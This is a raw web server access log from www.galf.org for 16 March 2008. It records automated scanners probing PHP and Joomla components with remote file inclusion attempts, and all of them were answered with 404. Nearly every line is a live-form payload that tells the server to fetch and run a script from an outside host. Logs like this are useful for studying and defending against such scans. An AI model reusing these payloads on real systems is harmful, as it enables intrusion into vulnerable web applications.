69.93.43.34 - - [16/Mar/2008:17:19:15 -0700] "GET /index.php?nic=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:19:15 -0700] "GET /index.php?nic=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
124.217.247.166 - - [16/Mar/2008:17:19:31 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://webmail.asl3.umbria.it/admin/inc/albania.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
58.26.137.64 - - [16/Mar/2008:17:19:40 -0700] "GET /logs/scripts.log//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://anjink.co.cc/gen/mix.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
218.150.160.162 - - [16/Mar/2008:17:21:18 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
218.150.160.162 - - [16/Mar/2008:17:21:24 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:21:30 -0700] "GET /logs/access.log/index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:21:30 -0700] "GET /index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:21:39 -0700] "GET /logs/access.log/index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:21:39 -0700] "GET /index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:17:22:01 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:22:15 -0700] "GET /logs/access_071203.log/index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:22:15 -0700] "GET /logs/access_071224.log/index.php?principal=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:22:15 -0700] "GET /index.php?principal=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:22:21 -0700] "GET /logs/access_071203.log/index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:22:55 -0700] "GET /index.php?principal=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:22:59 -0700] "GET /index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:23:17 -0700] "GET /index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:23:21 -0700] "GET /logs/access_070730.log/index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:23:21 -0700] "GET /index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:23:26 -0700] "GET /logs/access_071224.log/index.php?principal=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:23:26 -0700] "GET /index.php?principal=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:23:26 -0700] "GET /logs/index.php?principal=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:23:30 -0700] "GET /logs/access_070716.log/index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:23:35 -0700] "GET /logs/access_070730.log/index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:23:35 -0700] "GET /index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:23:40 -0700] "GET /logs/access_070716.log/index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:23:47 -0700] "GET /index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:23:49 -0700] "GET /index.php?principal=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:23:54 -0700] "GET /logs/access.log/index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:23:54 -0700] "GET /index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:23:54 -0700] "GET /logs/index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:23:57 -0700] "GET /index.php?principal=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.25.95.194 - - [16/Mar/2008:17:24:06 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.25.95.194 - - [16/Mar/2008:17:24:07 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:24:15 -0700] "GET /index.php?go=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:24:15 -0700] "GET /logs/access_070723.log/index.php?go=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:17:24:27 -0700] "GET /logs/access_071015.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:17:24:27 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
88.204.37.199 - - [16/Mar/2008:17:24:36 -0700] "GET /logs/access_070917.log/convert/mvcw.php?step=1&vwar_root=http://www.ossec.net/wiki/index.php/Safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:24:45 -0700] "GET /logs/access_080218.log/index.php?go=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:24:46 -0700] "GET /index.php?go=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:24:46 -0700] "GET /logs/access_070723.log/index.php?go=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
216.130.191.252 - - [16/Mar/2008:17:24:52 -0700] "GET /logs/access_070709.log//components/com_minibb.php?absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.130.191.252 - - [16/Mar/2008:17:24:52 -0700] "GET //components/com_minibb.php?absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.130.191.252 - - [16/Mar/2008:17:24:52 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.36.235.74 - - [16/Mar/2008:17:24:55 -0700] "GET /logs/access_070924.log/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.235.74 - - [16/Mar/2008:17:24:55 -0700] "GET /logs/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.235.74 - - [16/Mar/2008:17:24:56 -0700] "GET /logs/access_071022.log/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:25:05 -0700] "GET /logs/access_071203.log/index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
216.130.191.252 - - [16/Mar/2008:17:25:35 -0700] "GET /logs/access_070716.log//components/com_minibb.php?absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.118.108.246 - - [16/Mar/2008:17:25:59 -0700] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mambembrincantes.com/site/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:26:01 -0700] "GET /logs/access_070730.log/index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:26:02 -0700] "GET /index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:26:02 -0700] "GET /logs/index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.114.4 - - [16/Mar/2008:17:26:47 -0700] "GET /logs/access_070716.log/index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:27:01 -0700] "GET /logs/access_071203.log/index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:27:02 -0700] "GET /index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:27:02 -0700] "GET /logs/access.log/index.php?pag=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.118.108.246 - - [16/Mar/2008:17:27:04 -0700] "GET /logs/access_070917.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mambembrincantes.com/site/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.218.85.18 - - [16/Mar/2008:17:27:19 -0700] "GET /logs/access_070709.log//components/com_minibb.php?absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.218.85.18 - - [16/Mar/2008:17:27:20 -0700] "GET //components/com_minibb.php?absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.86.80.16 - - [16/Mar/2008:17:27:36 -0700] "GET //update/update2.php?lang=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.86.80.16 - - [16/Mar/2008:17:27:36 -0700] "GET /logs//update/update2.php?lang=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.52.2.130 - - [16/Mar/2008:17:27:48 -0700] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.2.130 - - [16/Mar/2008:17:27:48 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.218.85.18 - - [16/Mar/2008:17:28:10 -0700] "GET /logs/access_070716.log//components/com_minibb.php?absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.93.48.162 - - [16/Mar/2008:17:28:29 -0700] "GET /logs/access_071105.log//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
218.150.160.162 - - [16/Mar/2008:17:28:53 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
218.150.160.162 - - [16/Mar/2008:17:28:57 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
218.150.160.162 - - [16/Mar/2008:17:28:59 -0700] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.freewebtown.com/crxr/cp?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
218.150.160.162 - - [16/Mar/2008:17:29:02 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://www.freewebtown.com/perocs/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:29:18 -0700] "GET /logs/access_071008.log/index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:29:18 -0700] "GET /index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:29:18 -0700] "GET /logs/index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:29:21 -0700] "GET /logs/access_071022.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
195.58.242.138 - - [16/Mar/2008:17:29:22 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://h1.ripway.com/mala/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:17:29:34 -0700] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:17:29:34 -0700] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.randdesign.de/ppoint/include/main.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:17:29:34 -0700] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.etclan.eu/downloads/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:17:29:34 -0700] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://www.etclan.eu/downloads/s.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:17:29:35 -0700] "GET /logs/accounts/inc/include.php?language=0&lang_settings[0][1]=http://fulls.iespana.es/testir.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
116.125.113.115 - - [16/Mar/2008:17:29:35 -0700] "GET /accounts/inc/include.php?language=0&lang_settings[0][1]=http://fulls.iespana.es/testir.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
87.118.102.153 - - [16/Mar/2008:17:29:40 -0700] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.galf.org"
87.118.102.153 - - [16/Mar/2008:17:29:40 -0700] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
67.228.60.242 - - [16/Mar/2008:17:29:57 -0700] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.galf.org"
67.228.60.242 - - [16/Mar/2008:17:29:57 -0700] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:30:07 -0700] "GET /logs/access_071224.log/index.php?principal=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:30:08 -0700] "GET /index.php?principal=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:30:08 -0700] "GET /logs/index.php?principal=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:30:13 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:30:13 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.239.175.35 - - [16/Mar/2008:17:30:31 -0700] "GET /logs/access_070716.log/index2.php?x=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:17:30:34 -0700] "GET /logs/access.log/index.php?nic=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
158.75.35.9 - - [16/Mar/2008:17:30:35 -0700] "GET /logs/index.php?nic=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
84.14.51.216 - - [16/Mar/2008:17:31:24 -0700] "GET /logs/index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.galf.org"
84.14.51.216 - - [16/Mar/2008:17:31:25 -0700] "GET /index.php?option=com_pollxt&Itemid=&mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
62.44.73.116 - - [16/Mar/2008:17:31:34 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.discapacidadesecuador.org/cache/.ownz/safeon.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.44.73.116 - - [16/Mar/2008:17:31:34 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.discapacidadesecuador.org/cache/.ownz/safeon.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:33:32 -0700] "GET /index.php?x=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:33:32 -0700] "GET /index.php?x=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
74.86.80.16 - - [16/Mar/2008:17:33:41 -0700] "GET /Index.php?id=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
74.86.80.16 - - [16/Mar/2008:17:33:42 -0700] "GET /logs/Index.php?id=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.galf.org"
218.150.160.162 - - [16/Mar/2008:17:34:18 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.newarkfirefighterspipeband.com/calendar/ws/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.36.235.74 - - [16/Mar/2008:17:35:36 -0700] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.235.74 - - [16/Mar/2008:17:35:36 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:36:05 -0700] "GET /logs/access_080218.log/index.php?go=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:36:05 -0700] "GET /logs/access_080218.log/index.php?go=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:36:05 -0700] "GET /logs/index.php?go=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:36:05 -0700] "GET /logs/index.php?go=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
69.93.43.34 - - [16/Mar/2008:17:36:07 -0700] "GET /logs/access_070723.log/index.php?go=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
